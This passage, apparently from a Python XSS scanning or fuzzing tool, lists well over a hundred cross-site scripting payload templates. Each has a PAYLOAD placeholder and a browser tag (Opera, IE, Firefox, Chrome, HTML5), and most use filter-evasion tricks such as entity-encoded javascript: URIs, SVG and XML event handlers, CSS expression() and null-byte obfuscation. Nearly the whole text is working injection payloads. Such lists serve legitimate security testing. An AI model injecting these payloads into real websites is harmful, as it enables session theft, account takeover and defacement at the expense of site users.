		{ 'payload':"""<a style="-o-link:'javascript:PAYLOAD';-o-link-source:current">X""",
		  'browser':"""[Opera]"""},
		{ 'payload':"""<style>p[foo=bar{}*{-o-link:'javascript:PAYLOAD'}{}*{-o-link-source:current}]{color:red};</style>""",
		  'browser':"""[Opera]"""},
		{ 'payload':'''<link rel=stylesheet href=data:,*%7bx:expression(PAYLOAD)%7d''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<style>@import "data:,*%7bx:expression(PAYLOAD)%7D";</style>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<a style="pointer-events:none;position:absolute;"><a style="position:absolute;" onclick="PAYLOAD;">XXX</a></a><a href="javascript:PAYLOAD">XXX</a>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<script>({set/**/$($){_/**/setter=$,_=PAYLOAD}}).$=eval</script>''',
		  'browser':"""[FF]"""},
		{ 'payload':'''<script>({0:#0=eval/#0#/#0#(PAYLOAD)})</script>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<script>ReferenceError.prototype.__defineGetter__('name', function(){PAYLOAD}),x</script>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<script>Object.__noSuchMethod__ = Function,[{}][0].constructor._('PAYLOAD')()</script>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<script src="#">{PAYLOAD}</script>;1''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''+ADw-html+AD4APA-body+AD4APA-div+AD4-top secret+ADw-/div+AD4APA-/body+AD4APA-/html+AD4-.toXMLString().match(/.*/m),PAYLOAD;''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<b><script<b></b><PAYLOAD</script </b>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<script<{PAYLOAD}/></script </>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<script>crypto.generateCRMFRequest('CN=0',0,0,null,'PAYLOAD',384,null,'rsa-dual-use')</script>''',
		  'browser':"""[FF]"""},
		{ 'payload':'''<script>[{'a':Object.prototype.__defineSetter__('b',function(){eval(arguments[0])}),'b':['PAYLOAD']}]</script>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<svg xmlns="http://www.w3.org/2000/svg"><g onload="javascript:PAYLOAD"></g></svg>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<svg xmlns="http://www.w3.org/2000/svg"><script>PAYLOAD</script></svg>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<svg onload="javascript:PAYLOAD" xmlns="http://www.w3.org/2000/svg"></svg>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<svg xmlns="http://www.w3.org/2000/svg"> <a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:PAYLOAD"><rect width="1000" height="1000" fill="white"/></a> </svg>''',
		  'browser':"""[FF]"""},
		{ 'payload':'''<?xml version="1.0" standalone="no"?> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <style type="text/css"> @font-face {font-family: y; src: url("PAYLOAD#x") format("svg");} body {font: 100px "y";} </style> </head> <body>X</body> </html>''',
		  'browser':"""[Opera 10]"""},
		{ 'payload':'''<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <animation xlink:href="javascript:PAYLOAD"/> <animation xlink:href="data:text/xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='PAYLOAD'%3E%3C/svg%3E"/> <image xlink:href="data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' onload='alert(PAYLOAD)'%3E%3C/svg%3E"/> <foreignObject xlink:href="javascript:PAYLOAD"/> <foreignObject xlink:href="data:text/xml,%3Cscript xmlns='http://www.w3.org/1999/xhtml'%3EPAYLOAD%3C/script%3E"/> </svg>''',
		  'browser':"""[Opera] [FF]"""},
		{ 'payload':'''<svg xmlns="http://www.w3.org/2000/svg"> <set attributeName="onmouseover" to="PAYLOAD"/> <animate attributeName="onunload" to="PAYLOAD"/> </svg>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<svg xmlns="http://www.w3.org/2000/svg"> <handler xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load">PAYLOAD</handler> </svg>''',
		  'browser':"""[Opera]"""},
		{ 'payload':'''<svg xmlns="http://www.w3.org/2000/svg" id="foo"> <x xmlns="http://www.w3.org/2001/xml-events" event="load" observer="foo" handler="data:image/svg+xml,%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Chandler%20xml%3Aid%3D%22bar%22%20type%3D%22application%2Fecmascript%22%3E PAYLOAD %3C%2Fhandler%3E%0A%3C%2Fsvg%3E%0A#bar"/> </svg>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<?xml version="1.0"?> <?xml-stylesheet type="text/xml" href="#stylesheet"?> <!DOCTYPE doc [ <!ATTLIST xsl:stylesheet id ID #REQUIRED>]> <svg xmlns="http://www.w3.org/2000/svg"> <xsl:stylesheet id="stylesheet" version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"> <xsl:template match="/"> <iframe xmlns="http://www.w3.org/1999/xhtml" src="javascript:PAYLOAD"></iframe> </xsl:template> </xsl:stylesheet> <circle fill="red" r="40"></circle> </svg>''',
		  'browser':"""[Opera]"""},
		{ 'payload':'''<svg xmlns="http://www.w3.org/2000/svg" id="x"> <listener event="load" handler="#y" xmlns="http://www.w3.org/2001/xml-events" observer="x"/> <handler id="y">PAYLOAD</handler> </svg>''',
		  'browser':"""[Opera]"""},
		{ 'payload':'''<svg><style>&ltimg/src=x onerror=PAYLOAD// </b>''',
		  'browser':"""[FF]"""},
		{ 'payload':'''<?xml-stylesheet type="text/xsl" href="#"?><img xmlns="x-schema:PAYLOAD"/>''',
		  'browser':"""[IE]"""},
		{ 'payload':'''<svg> <image style='filter:url("data:image/svg+xml,<svg xmlns=%22http://www.w3.org/2000/svg%22><script>parent.PAYLOAD</script></svg>")'></svg>''',
		  'browser':"""[Opera]"""},
		{ 'payload':'''<?xml-stylesheet href="javascript:PAYLOAD"?>''',
		  'browser':"""[Opera]"""},
		{ 'payload':'''<!DOCTYPE x[<!ENTITY x SYSTEM "PAYLOAD">]><y>&x;</y>''',
		  'browser':"""[IE]"""},
		{ 'payload':'''<?xml-stylesheet type="text/css"?><!DOCTYPE x SYSTEM "PAYLOAD"><x>&x;</x>''',
		  'browser':"""[IE]"""},
		{ 'payload':'''<?xml version="1.0"?> <?xml-stylesheet type="text/xsl" href="data:,%3Cxsl:transform version='1.0' xmlns:xsl='http://www.w3.org/1999/XSL/Transform' id='X'%3E%3Cxsl:output method='html'/%3E%3Cxsl:template match='/'%3E%3Cscript%3EPAYLOAD%3C/script%3E%3C/xsl:template%3E%3C/xsl:transform%3E"?> <root/>''',
		  'browser':"""[Opera]"""},
		{ 'payload':'''<!DOCTYPE x [ <!ATTLIST img xmlns CDATA "http://www.w3.org/1999/xhtml" src CDATA "x" onerror CDATA "PAYLOAD"> ]><img /><doc xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:html="http://www.w3.org/1999/xhtml"> <html:style /><x xlink:href="javascript:PAYLOAD" xlink:type="simple">XXX</x> </doc>''',
		  'browser':"""[Opera] [FF]"""},
		{ 'payload':'''<card xmlns="http://www.wapforum.org/2001/wml"><onevent type="ontimer"><go href="javascript:PAYLOAD"/></onevent><timer value="1"/></card>''',
		  'browser':"""[Opera]"""},
		{ 'payload':'''<?xml-stylesheet type="text/css"?><root style="x:expression(PAYLOAD)"/>''',
		  'browser':"""[IE]"""},
		{ 'payload':'''<x xmlns:xlink="http://www.w3.org/1999/xlink" xlink:actuate="onLoad" xlink:href="javascript:PAYLOAD" xlink:type="simple"/>''',
		  'browser':"""[FF]"""},
		{ 'payload':'''<?xml-stylesheet type="text/css" href="data:,*%7bx:expression(PAYLOAD);%7d"?>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<x:template xmlns:x="http://www.wapforum.org/2001/wml" x:ontimer="$(x:unesc)j$(y:escape)a$(z:noecs)v$(x)a$(y)s$(z)cript$x:PAYLOAD"><x:timer value="1"/></x:template>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="javascript:PAYLOAD//#x"/>''',
		  'browser':"""[Opera]"""},
		{ 'payload':'''<x xmlns:ev="http://www.w3.org/2001/xml-events" ev:event="load" ev:handler="PAYLOAD#x"/>''',
		  'browser':"""[Opera]"""},
		{ 'payload':'''X<x style=`behavior:url(#default#time2)` onbegin=`PAYLOAD` >''',
		  'browser':"""[IE]"""},
		{ 'payload':'''1<set/xmlns=`urn:schemas-microsoft-com:time` style=`beh&#x41vior:url(#default#time2)` attributename=`innerhtml` to=`&lt;img/src=&quot;x&quot;onerror=PAYLOAD&gt;`>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''1<animate/xmlns=urn:schemas-microsoft-com:time style=behavior:url(#default#time2) attributename=innerhtml values=&lt;img/src=&quot;.&quot;onerror=PAYLOAD&gt;>''',
		  'browser':"""[IE]"""},
		{ 'payload':'''1<a href=#><line xmlns=urn:schemas-microsoft-com:vml style=behavior:url(#default#vml);position:absolute href=javascript:PAYLOAD strokecolor=white strokeweight=1000px from=0 to=1000 /></a>''',
		  'browser':"""[IE]"""},
		{ 'payload':'''<a style="behavior:url(#default#AnchorClick);" folder="javascript:PAYLOAD">XXX</a>''',
		  'browser':"""[IE]"""},
		{ 'payload':'''<event-source src="PAYLOAD" onload="PAYLOAD">''',
		  'browser':"""[Opera]"""},
		{ 'payload':'''<a href="javascript:PAYLOAD"><event-source src="data:application/x-dom-event-stream,Event:click%0Adata:XXX%0A%0A">''',
		  'browser':"""[Opera]"""},
		{ 'payload':'''<div id="x">x</div> <xml:namespace prefix="t"> <import namespace="t" implementation="#default#time2"> <t:set attributeName="innerHTML" targetElement="x" to="&lt;img&#11;src=x:x&#11;onerror&#11;=PAYLOAD&gt;">''',
		  'browser':"""[IE]"""},
		{ 'payload':'''<SCRIPT SRC=PAYLOAD?<B>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<BODY onload!#$%%&()*~+-_.,:;?@[/|\]^`=PAYLOAD>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<SCRIPT/SRC="PAYLOAD"></SCRIPT>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<iframe src=PAYLOAD <''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<LAYER SRC="PAYLOAD"></LAYER>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<STYLE>li {list-style-image: url("javascript:PAYLOAD");}</STYLE><UL><LI>X''',
		  'browser':"""[Not Info]"""},
   		{ 'payload':'''<META HTTP-EQUIV="Link" Content="<PAYLOAD>; REL=stylesheet">''',
		  'browser':"""[Opera 8]"""},
		{ 'payload':'''<STYLE type="text/css">BODY{background:url("javascript:PAYLOAD")}</STYLE>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<HTML xmlns:X><?import namespace="X" implementation="%(htc)s"><X:X>X</X:X></HTML>""","XML namespace."),("""<XML ID="X"><I><B>&lt;IMG SRC="javas<!-- -->cript:PAYLOAD"&gt;</B></I></XML><SPAN DATASRC="#X" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>''',
		  'browser':"""[IE]"""},
		{ 'payload':'''<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="X&lt;SCRIPT DEFER&gt;PAYLOAD&lt;/SCRIPT&gt;"></BODY></HTML>''',
		  'browser':"""[IE]"""},
		{ 'payload':'''<P STYLE="behavior:url('#default#time2')" end="0" onEnd="PAYLOAD">''',
		  'browser':"""[IE]"""},
		{ 'payload':'''<STYLE>a{background:url('s1' 's2)}@import javascript:PAYLOAD;');}</STYLE>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<meta charset= "x-imap4-modified-utf7"&&>&&<script&&>PAYLOAD&&;&&<&&/script&&>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<SCRIPT onreadystatechange=javascript:PAYLOAD;></SCRIPT>''',
		  'browser':"""[IE]"""},
		{ 'payload':'''<style onreadystatechange=javascript:PAYLOAD;></style>''',
		  'browser':"""[IE]"""},
		{ 'payload':'''<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>PAYLOAD;</html:script></html:html>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<embed code=javascript:PAYLOAD;></embed>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<frameset onload=javascript:PAYLOAD></frameset>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<object onerror=javascript:PAYLOAD>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<embed type="image" src=PAYLOAD></embed>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<a href="jav&#65ascript:PAYLOAD">X1</a>''',
		  'browser':"""[Opera]"""},
		{ 'payload':'''<a href="jav&#97ascript:PAYLOAD">X1</a>''',
		  'browser':"""[Opera]"""},
		{ 'payload':'''<embed width=500 height=500 code="data:text/html,<script>PAYLOAD</script>"></embed>''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<iframe srcdoc="&LT;iframe&sol;srcdoc=&amp;lt;img&sol;src=&amp;apos;&amp;apos;onerror=PAYLOAD&amp;gt;>">''',
		  'browser':"""[Not Info]"""},
		{ 'payload':'''<script>if(document.createElement("td").cellIndex == 0){PAYLOAD}</script>''',
		  'browser':"""[IE]"""},
		{ 'payload':'''<script>v=document.createElement("td").cellIndexif( v == -1){PAYLOAD}</script>''',
		  'browser':"""[IE]"""},
		{ 'payload':'''<script>v=document.createElement("td").cellIndexif( v> 1){PAYLOAD}</script>''',
		  'browser':"""[IE]"""},
		{ 'payload':'''<script>v=document.createElement("td").cellIndexif( v== undefined){PAYLOAD}</script>''',
		  'browser':"""[IE]"""},
		{ 'payload':'''<div/style="width:expression(confirm(PAYLOAD))">X</div>''',
		  'browser':"""[IE7.0]"""},
		{ 'payload':"""<sVg><scRipt %00>alert&lpar;PAYLOAD&rpar;""",
		  'browser':"""[Opera]"""},
        { 'payload':"""<svg><script x:href='PAYLOAD'""",
          'browser':"""[Opera]"""},
        { 'payload':"""&#13;<blink/&#13; onmouseover=pr&#x6F;mp&#116;(PAYLOAD)>OnMouseOver""",
          'browser':"""[Opera|FF2.0]"""},
        { 'payload':"""<svg><script psy> alert(PAYLOAD)""",
          'browser':"""[Opera]"""},
        { 'payload':"""<iframe %00 src="&Tab;javascript:prompt(PAYLOAD)&Tab;"%00>""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<svg><style>{font-family&colon;'<iframe/onload=confirm(PAYLOAD)>'""",
          'browser':"""[Chrome]"""},
        { 'payload':'''<input/onmouseover="javaSCRIPT&colon;confirm&lpar;PAYLOAD&rpar;"''',
          'browser':"""[Chrome]"""},
        { 'payload':"""<img/src='%00' onerror=this.onerror=confirm(PAYLOAD)""",
          'browser':"""[Chrome]"""},
        { 'payload':'''<form><isindex formaction="javascript&colon;confirm(PAYLOAD)"''',
          'browser':"""[Chrome]"""},
        { 'payload':"""<img src='%00'&NewLine; onerror=alert(PAYLOAD)&NewLine;""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<script/&Tab; src='PAYLOAD' /&Tab;></script>""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<ScRipT 5-0*3+9/3=>prompt(PAYLOAD)</ScRipT giveanswerhere=?""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<script /*%00*/>/*%00*/alert(PAYLOAD)/*%00*/</script /*%00*/""",
          'browser':"""[Chrome]"""},
        { 'payload':"""&#34;&#62;<h1/onmouseover='\u0061lert(PAYLOAD)'>%00""",
          'browser':"""[Chrome]"""},
        { 'payload':'''<iframe/src="data:text/html,<svg &#111;&#110;load=alert(PAYLOAD)>">''',
          'browser':"""[Chrome]"""},
        { 'payload':'''<meta content="&NewLine; 1 &NewLine;; JAVASCRIPT&colon; alert(PAYLOAD)" http-equiv="refresh"/>''',
          'browser':"""[Chrome]"""},
        { 'payload':"""<svg><script xlink:href=data&colon;,window.open('PAYLOAD')></script""",
          'browser':"""[Chrome] [FF]"""},
        { 'payload':'''<meta http-equiv="refresh" content="0;url=javascript:confirm(PAYLOAD)">''',
          'browser':"""[Chrome]"""},
        { 'payload':"""<img/&#09;&#10;&#11; src='~' onerror=prompt(PAYLOAD)>""",
          'browser':"""[Chrome]"""},
        { 'payload':'''<form><iframe &#09;&#10;&#11; src="javascript&#58;alert(PAYLOAD)"&#11;&#10;&#09;;>''',
          'browser':"""[Chrome]"""},
        { 'payload':"""http://www.google<script .com>alert(PAYLOAD)</script""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<script ^__^>alert(PAYLOAD)</script ^__^""",
          'browser':"""[Chrome]"""},
        { 'payload':"""</style &#32;><script &#32; :-(>/**/alert(PAYLOAD)/**/</script &#32; :-(""",
          'browser':"""[Chrome]"""},
        { 'payload':'''&#00;</form><input type&#61;"date" onfocus="alert(PAYLOAD)">''',
          'browser':"""[Chrome]"""},
        { 'payload':"""<form><textarea &#13; onkeyup='PAYLOAD'>""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<script /***/>/***/confirm('PAYLOAD')/***/</script /***/""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<iframe srcdoc='&lt;body onload=prompt&lpar;PAYLOAD&rpar;&gt;'>""",
          'browser':"""[Chrome]"""},
        { 'payload':'''<a href="javascript:void(0)" onmouseover=&NewLine;javascript:alert(PAYLOAD)&NewLine;>X</a>''',
          'browser':"""[Chrome]"""},
        { 'payload':"""<script ~~~>alert(PAYLOAD)</script ~~~>""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<style/onload=&lt;!--&#09;&gt;&#10;alert&#10;&lpar;PAYLOAD&rpar;>""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<///style///><span %2F onmousemove='alert&lpar;PAYLOAD&rpar;'>SPAN""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<img/src='http://i.imgur.com/removed.png' onmouseover=&Tab;prompt(PAYLOAD)""",
          'browser':"""[Chrome]"""},
        { 'payload':"""&#34;&#62;<svg><style>{-o-link-source&colon;'<body/onload=confirm(PAYLOAD)>'""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<marquee onstart='javascript:alert&#x28;PAYLOAD&#x29;'>^__^""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<iframe/%00/ src=javaSCRIPT&colon;alert(PAYLOAD)""",
          'browser':"""[Chrome]"""},
        { 'payload':'''/*iframe/src*/<iframe/src="<iframe/src=@"/onload=prompt(PAYLOAD) /*iframe/src*/>''',
          'browser':"""[Chrome]"""},
        { 'payload':"""//|\\ <script //|\\ src='PAYLOAD'> //|\\ </script //|\\""",
          'browser':"""[Chrome]"""},
        { 'payload':"""</font>/<svg><style>{src&#x3A;'<style/onload=this.onload=confirm(PAYLOAD)>'</font>/</style>""",
          'browser':"""[Chrome]"""},
        { 'payload':'''<a/href="javascript:&#13; javascript:prompt(PAYLOAD)"><input type="X">''',
          'browser':"""[Chrome]"""},
        { 'payload':"""</plaintext\></|\><plaintext/onmouseover=prompt(PAYLOAD)""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<div onmouseover='alert&lpar;PAYLOAD&rpar;'>DIV</div>""",
          'browser':"""[Chrome]"""},
        { 'payload':'''<iframe style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(PAYLOAD)">''',
          'browser':"""[Chrome]"""},
        { 'payload':'''<a href="jAvAsCrIpT&colon;alert&lpar;PAYLOAD&rpar;">X</a>''',
          'browser':"""[Chrome]"""},
        { 'payload':'''<embed src="PAYLOAD">''',
          'browser':"""[Chrome]"""},
        { 'payload':'''<object data="PAYLOAD">''',
          'browser':"""[Chrome]"""},
        { 'payload':"""<var onmouseover="prompt(PAYLOAD)">On Mouse Over</var>""",
          'browser':"""[Chrome]"""},
        { 'payload':'''<img src="/" =_=" title="onerror="prompt(PAYLOAD)"">''',
          'browser':"""[Chrome]"""},
        { 'payload':"""<%<!--'%><script>alert(PAYLOAD);</script -->""",
          'browser':"""[Chrome]"""},
        { 'payload':'''<script src="data:text/javascript,alert(PAYLOAD)"></script>''',
          'browser':"""[Chrome]"""},
        { 'payload':"""<iframe/src \/\/onload = prompt(PAYLOAD)""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<iframe/onreadystatechange=alert(PAYLOAD)""",
          'browser':"""[Chrome] [IE]"""},
        { 'payload':"""<svg/onload=alert(PAYLOAD)""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<input value=<><iframe/src=javascript:confirm(PAYLOAD)""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<input type='text' value='' <div/onmouseover='alert(PAYLOAD)'>X</div>""",
          'browser':"""[Chrome]"""},
        { 'payload':"""http://www.<script>alert(PAYLOAD)</script .com""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<svg><script ?>alert(PAYLOAD)""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<img src='xx:xx'onerror=alert(PAYLOAD)>""",
          'browser':"""[Chrome]"""},
        { 'payload':'''<object type="text/x-scriptlet" data="PAYLOAD "></object>''',
          'browser':"""[Chrome]"""},
        { 'payload':'''<meta http-equiv="refresh" content="0;javascript&colon;alert(PAYLOAD)"/>''',
          'browser':"""[Chrome]"""},
        { 'payload':'''<math><a xlink:href="PAYLOAD">click''',
          'browser':"""[Chrome] [FF]"""},
        { 'payload':'''<embed code="PAYLOAD" allowscriptaccess=always>''',
          'browser':"""[Chrome]"""},
        { 'payload':"""<svg contentScriptType=text/vbs><script>MsgBox+PAYLOAD""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<iframe/onreadystatechange=\u0061\u006C\u0065\u0072\u0074('PAYLOAD')>""",
          'browser':"""[Chrome] [IE]"""},
        { 'payload':'''<script/src="data&colon;text%2Fj\u0061v\u0061script,\u0061lert("PAYLOAD")"></script a=\u0061 & /=%2F''',
          'browser':"""[Chrome]"""},
        { 'payload':"""<script/src=data&colon;text/j\u0061v\u0061&#115&#99&#114&#105&#112&#116,\u0061%6C%65%72%74(/PAYLOAD/)></script""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<object data=javascript&colon;\u0061&#x6C;&#101%72t(PAYLOAD)>""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<script>+-+-1-+-+alert(PAYLOAD)</script>""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<body/onload=&lt;!--&gt;&#10alert(PAYLOAD)>""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<img src ?psy?\/onerror = alert(PAYLOAD)""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<svg><script>//&NewLine;confirm(PAYLOAD);</script </svg>""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaa aaaaaaaaaa href=j&#97v&#97script&#x3A;&#97lert(PAYLOAD)>ClickMe""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<script x> alert(PAYLOAD) </script 1=2""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<div/onmouseover='alert(PAYLOAD)'> style='x:'>""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<--'<img/src=' onerror=alert(PAYLOAD)> --!>""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<script/src=&#100&#97&#116&#97:text/&#x6a&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x000070&#x074,&#x0061;&#x06c;&#x0065;&#x00000072;&#x00074;(PAYLOAD)></script>""",
          'browser':"""[Chrome]"""},
        { 'payload':'''<div style="position:absolute;top:0;left:0;width:100%;height:100%" onmouseover="prompt(PAYLOAD)" onclick="alert(PAYLOAD)">x</button>''',
          'browser':"""[Chrome]"""},
        { 'payload':"""'><img src=x onerror=window.open('PAYLOAD');>""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<form><button formaction=javascript&colon;alert(PAYLOAD)>CLICKME""",
          'browser':"""[Chrome]"""},
        { 'payload':"""<form id="test" /><button form="test" formaction="javascript:PAYLOAD">X""",
          'browser':"""[HTML5 Injection]"""},
        { 'payload':"""<input onfocus=javascript:PAYLOAD autofocus>""",
          'browser':"""[HTML5 Injection]"""},
        { 'payload':"""<select onfocus=javascript:PAYLOAD autofocus>""",
          'browser':"""[HTML5 Injection]"""},
        { 'payload':"""<textarea onfocus=javascript:PAYLOAD autofocus>""",
          'browser':"""[HTML5 Injection]"""},
        { 'payload':"""<keygen onfocus=javascript:PAYLOAD autofocus>""",
          'browser':"""[HTML5 Injection]"""},
        { 'payload':"""<input onblur=javascript:PAYLOAD autofocus><input autofocus>""",
          'browser':"""[HTML5 Injection]"""},
        { 'payload':"""<body onscroll=PAYLOAD><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>""",
          'browser':"""[HTML5 Injection]"""},
        { 'payload':"""X<form id=test onforminput=javascript:PAYLOAD><input></form>""",
          'browser':"""[HTML5 Injection]"""},
        { 'payload':"""X<form id=test><input></form><button form=test onformchange==javascript:PAYLOAD>X""",
          'browser':"""[HTML5 Injection]"""},
        { 'payload':'''<img src=1 href=1 onerror="javascript:PAYLOAD"></img>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<audio src=1 href=1 onerror="javascript:PAYLOAD"></audio>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<video src=1 href=1 onerror="javascript:PAYLOAD"></video>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<body src=1 href=1 onerror="javascript:PAYLOAD"></body>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<image src=1 href=1 onerror="javascript:PAYLOAD"></image>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<object src=1 href=1 onerror="javascript:PAYLOAD"></object>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<script src=1 href=1 onerror="javascript:PAYLOAD"></script>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<svg onResize svg onResize="javascript:javascript:PAYLOAD"></svg onResize>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<title onPropertyChange title onPropertyChange="javascript:javascript:PAYLOAD"></title onPropertyChange>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<iframe onLoad iframe onLoad="javascript:javascript:PAYLOAD"></iframe onLoad>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<body onMouseEnter body onMouseEnter="javascript:javascript:PAYLOAD"></body onMouseEnter>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<body onFocus body onFocus="javascript:javascript:PAYLOAD"></body onFocus>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<frameset onScroll frameset onScroll="javascript:javascript:PAYLOAD"></frameset onScroll>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<script onReadyStateChange script onReadyStateChange="javascript:javascript:PAYLOAD"></script onReadyStateChange>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<html onMouseUp html onMouseUp="javascript:javascript:PAYLOAD"></html onMouseUp>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<body onPropertyChange body onPropertyChange="javascript:javascript:PAYLOAD"></body onPropertyChange>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<svg onLoad svg onLoad="javascript:javascript:PAYLOAD"></svg onLoad>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<body onPageHide body onPageHide="javascript:javascript:PAYLOAD"></body onPageHide>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<body onMouseOver body onMouseOver="javascript:javascript:PAYLOAD"></body onMouseOver>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<body onUnload body onUnload="javascript:javascript:PAYLOAD"></body onUnload>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<body onLoad body onLoad="javascript:javascript:PAYLOAD"></body onLoad>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<bgsound onPropertyChange bgsound onPropertyChange="javascript:javascript:PAYLOAD"></bgsound onPropertyChange>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<html onMouseLeave html onMouseLeave="javascript:javascript:PAYLOAD"></html onMouseLeave>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<html onMouseWheel html onMouseWheel="javascript:javascript:PAYLOAD"></html onMouseWheel>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<style onLoad style onLoad="javascript:javascript:PAYLOAD"></style onLoad>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<iframe onReadyStateChange iframe onReadyStateChange="javascript:javascript:PAYLOAD"></iframe onReadyStateChange>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<body onPageShow body onPageShow="javascript:javascript:PAYLOAD"></body onPageShow>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<style onReadyStateChange style onReadyStateChange="javascript:javascript:PAYLOAD"></style onReadyStateChange>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<frameset onFocus frameset onFocus="javascript:javascript:PAYLOAD"></frameset onFocus>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<applet onError applet onError="javascript:javascript:PAYLOAD"></applet onError>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<marquee onStart marquee onStart="javascript:javascript:PAYLOAD"></marquee onStart>''',
		  'browser':"""[Not Info]"""},
        { 'payload':'''<script onLoad script onLoad="javascript:javascript:PAYLOAD"></script onLoad>''',
